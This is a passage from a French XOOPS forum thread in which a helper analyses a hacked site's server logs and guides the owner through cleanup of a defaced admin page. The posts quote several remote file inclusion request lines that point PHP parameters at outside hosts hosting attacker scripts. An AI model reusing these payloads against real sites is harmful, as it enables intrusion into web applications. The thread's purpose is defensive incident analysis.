Fork me on GitHub




« 1 (2) 3 4 »


Re: Help : adminsitration de mon site hacké
Xoops accro
Inscrit: 15/07/2004 11:16
Messages: 4763
Oups je suis passé au travers de ton message avec les logs.
Je jette un oeil.
As-tu vérifié ton pied de page dans l'administration pour voir si une redirection n'avait pas été ajoutée ?
Pense à changer tes mots de passe également. (admininistrateur et base de données).

Posté le : 19/02/2008 08:15
Partager Twitter Partagez cette article sur GG+
Re: Help : adminsitration de mon site hacké
Xoops accro
Inscrit: 15/07/2004 11:16
Messages: 4763
Juste comme ça au tout premier coup d'oeil, on voit par exemple que tu as eu des tentatives de hack (bot script qui cherche un phpBB)

Citation :

62.73.5.183 - - [13/Feb/2008:22:05:07 +0100] "GET /modules/newbb/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79"
62.73.5.183 - - [13/Feb/2008:22:05:07 +0100] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79"
195.32.96.7 - - [13/Feb/2008:23:02:19 +0100] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79"
83.83.130.192 - - [13/Feb/2008:21:23:44 +0100] "GET /modules/news/comment_reply.php?com_itemid=http://holengirl.eclub.lv/images/me? HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"


mais ça n'avait rien donné pour eux bien entendu.
je continue.

Dans les logs du 15, on a ça par exemple (entre autre du même genre):
Citation :

90.53.97.15 - - [14/Feb/2008:09:31:20 +0100] "GET /modules/news/comment_reply.php?com_itemid=http://nsmsisoeueeitsdwfdfhfrdefaiss.land.ru/.html/head? HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"


Citation :

83.86.1.146 - - [14/Feb/2008:12:29:06 +0100] "GET /modules/news/article.php?storyid=http://zaperyan1918moon.chat.ru/html/aboutme? HTTP/1.1" 200 885 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"


Avec une erreur 200 il semble que le fichier était présent sur le site russe au moment des faits.
Mais ce n'est plus le cas, impossible donc de savoir que contenant ce fichier et ce qu'il a pu faire.

Es-tu à jour pour ton module de news ?

Citation :

222.239.227.171 - - [13/Feb/2008:16:08:55 +0100] "GET /modules/newbb//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.oneshotmarines.com/includes/echo.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65"
222.239.227.171 - - [13/Feb/2008:16:08:56 +0100] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.oneshotmarines.com/includes/echo.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65"
222.239.227.171 - - [13/Feb/2008:16:09:01 +0100] "GET /modules//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.oneshotmarines.com/includes/echo.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65"


ces tentatives là ont échoué car une erreur 404 leur est retournée.

Pour la journée du 16 il y a d'autres tentatives sur le modules news, mais même chose, les fichiers y étaient ce jour-là mais plus aujourd'hui, donc pas moyen de savoir ce que ces fichiers ont exécuté.

Là ton site est down donc ?
Dans tous les cas, en cas de hack, mis à part trouver par où ils sont passés, le mieux est toujours de restaurer une sauvegarde récente, pour être sûr de ne pas leur laisser une porte d'entrée.
Sans compter la mise à jour de tous les modules et de xoops.

Posté le : 19/02/2008 08:30
Partager Twitter Partagez cette article sur GG+
Re: Help : adminsitration de mon site hacké
Xoops accro
Inscrit: 15/07/2004 11:16
Messages: 4763
Bon je ne vois rien d'autre de spécial dans ces 3 jours de logs.

Posté le : 19/02/2008 09:30
Partager Twitter Partagez cette article sur GG+
Re: Help : adminsitration de mon site hacké
Régulier
Inscrit: 11/04/2006 17:08
Messages: 186
Mille fois Merci

Pour le pied de page je t'ai mis un quatrième fichier qui est le code source de la page admin : je ne sais pas si tu l'as vu ?

Non mon site n'est pas down du tout : pire il fonctionne très bien et ne parait même pas etre hacké.

Le seul moyen de le savoir est d'entrer dans l'administration et c'est la que toute une page apparait 3 secondes après ma connexion à "adminstration xoops".

J'ai contacté 4 gars qui se sont faits hacker samedi et tous étaient sous joomla mais eux les hackers ont bousillé leur site et c'est la page d'accueil qui a morflé, pas la page d'amin.

Cette page c'est une grande photo avec un drapeau turc (d'autres gars qui ont eu a faire avec les mêmes hackers ont la même photo mais cette fois avec un loup qui a du sang dans gueule et la croix gammée hitlérienne à ses pieds : flippant ces mecs) et toute une propagande anti-occidentale.

Toute cette propagande recouvre ma page d'administration.

Posté le : 20/02/2008 00:03
Partager Twitter Partagez cette article sur GG+
Re: Help : adminsitration de mon site hacké
Xoops accro
Inscrit: 15/07/2004 11:16
Messages: 4763
ton site c'est bien yankee ?
Si j'essaie d'aller sur le .com (ou sur n'importe quel autre lien), je suis redirigé vers : www.baseball-tickets.org

Dans les logs, j'ai vu que tu avais mis le code source de l'admin.

A la rigueur, tu peux m'envoyer un accès ftp et à ta base de données par MP si tu veux.
Comme ça, je regarde directement dans la base de données, s'il y a du code injecté.
Idem pour le ftp, aussi bien, il y a un htaccess qui traîne, ou ton mainfile a été modifié, etc....

Posté le : 20/02/2008 08:14
Partager Twitter Partagez cette article sur GG+
Re: Help : adminsitration de mon site hacké
Régulier
Inscrit: 11/04/2006 17:08
Messages: 186
Ok je t'envoies ça par MP ce soir quand je reviens. merci

Posté le : 20/02/2008 14:32
Partager Twitter Partagez cette article sur GG+
Re: Help : adminsitration de mon site hacké
Xoops accro
Inscrit: 15/07/2004 11:16
Messages: 4763
Ca marche, mais je ne regarderai sans doute que demain matin

Posté le : 20/02/2008 14:39
Partager Twitter Partagez cette article sur GG+
Re: Help : adminsitration de mon site hacké
Régulier
Inscrit: 11/04/2006 17:08
Messages: 186
C'est fait

Posté le : 21/02/2008 03:58
Partager Twitter Partagez cette article sur GG+
Re: Help : adminsitration de mon site hacké
Régulier
Inscrit: 11/04/2006 17:08
Messages: 186
merci à Blueteen : ça remarche

Posté le : 21/02/2008 17:41
Partager Twitter Partagez cette article sur GG+
Re: Help : adminsitration de mon site hacké
Xoops accro
Inscrit: 15/07/2004 11:16
Messages: 4763
En attendant d'accéder à sa base de données, j'ai regardé un peu les fichiers sur le ftp, et j'ai vu que le fichier adminmenu.php contenait les fameux codes de propagande.
J'en ai donc déduis que ce fichier avait altéré (ce qui m'embête c'est que l'on ne soit pas parvenu à trouver par où ils sont passés).
Du coup, j'ai supprimé ce fichier (qui est donc régénéré lorsqu'on retourne dans l'administration).
Si ça n'avait pas marché, ça voulait sûrement dire que sa base était touchée (d'ailleurs on ne peut pas savoir si c'est le cas ou non, en général après un hack on restaure la dernière sauvegarde clean qu'on peut avoir, pour éviter de laisser des portes d'entrée).

Fais bien des sauvegardes régulières (fichiers du site + base de données), car on a pas trouvé la faille, et ça peut se reproduire, en plus grave !

Posté le : 21/02/2008 17:50
Partager Twitter Partagez cette article sur GG+

 Haut   Précédent   Suivant
« 1 (2) 3 4 »



Vous pouvez voir les sujets.
Vous ne pouvez pas débuter de nouveaux sujets.
Vous ne pouvez pas répondre aux contributions.
Vous ne pouvez pas éditer vos contributions.
Vous ne pouvez pas effacez vos contributions.
Vous ne pouvez pas ajouter de nouveaux sondages.
Vous ne pouvez pas voter en sondage.
Vous ne pouvez pas attacher des fichiers à vos contributions.
Vous ne pouvez pas poster sans approbation.

Propulsé avec XOOPS | Graphisme adapté par Tatane, Grosdunord, Montuy337513

32 Personne(s) en ligne (27 Personne(s) connectée(s) sur Forum) | Utilisateur(s): 0 | Invité(s): 32 | Plus ...